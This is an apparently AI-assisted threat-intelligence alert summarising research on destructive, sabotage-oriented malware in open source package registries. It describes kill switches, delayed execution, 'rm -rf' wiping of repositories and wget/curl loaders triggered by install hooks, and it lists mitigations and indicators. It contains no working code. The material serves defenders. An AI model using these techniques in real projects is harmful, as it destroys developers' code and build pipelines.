20251224-0624-socket.dev-4d1eb | Perceptive Security

Destructive malware is rising across open source registries, using delays and kill switches to wipe code, break builds, and disrupt CI/CD.

Published:

24 December 2025 at 06:24:14

Alert date:

24 December 2025 at 07:02:20

Source:

socket.dev

Supply Chain & Dependencies, Ransomware & Malware

Socket Threat Research Team observed a steady rise in destructive and sabotage-oriented malware embedded in open source packages across npm, PyPI, NuGet Gallery, and Go module indexes. These packages target developer environments by deleting source code, breaking builds, and wiping repositories. Four main patterns emerged: remote kill switches, time-delayed execution, targeted codebase wiping, and remote payload fetching. Unlike financially motivated campaigns, these attacks focus on operational disruption rather than financial gain. The malware often uses lifecycle hooks to execute without being explicitly imported, allowing it to propagate across CI/CD pipelines.

Technical details

Four primary destructive patterns observed: 1) Remote kill switches - malicious packages poll attacker-controlled endpoints for activation commands, 2) Time-delayed execution - destructive payloads execute after fixed delays or calendar dates, 3) Targeted codebase wiping - selective deletion of Git repositories, source directories, configuration files, and CI build outputs using commands like 'rm -rf', 4) Remote payload fetching - packages act as loaders fetching destructive scripts using wget, curl, or HTTP clients. Malware executes via standard lifecycle hooks during dependency installation without requiring explicit import. Targets developer environments surgically rather than full system destruction.

Mitigation steps:

Disable unnecessary lifecycle scripts in CI environments, enforce strict dependency pinning with provenance checks, monitor for unexpected file-system deletion during builds, treat any dependency performing recursive delete operations as suspicious, prefer established packages with transparent maintainers over newly published alternatives, verify dependency provenance to ensure published code matches repository code, use Socket's security tools including GitHub App, CLI, and browser extension to detect destructive packages before production deployment

Affected products:

npm packages
PyPI packages
NuGet Gallery packages
Go modules
React framework projects
Vue framework projects
Vite framework projects
WhatsApp development tooling
passlib library (typosquatted)
chalk package (typosquatted)
chokidar package (typosquatted)

Related CVE's:

Related threat actors:

IOC's:

Packages polling remote endpoints for activation signals, Recursive delete commands targeting developer directories, Time-delayed destructive behavior after installation, Packages fetching remote scripts using wget/curl, Targeting of .git repositories and framework-specific directories, Lifecycle hooks executing destructive payloads during installation, Typosquatted package names similar to popular libraries

This article was created with the assistance of AI technology by Perceptive.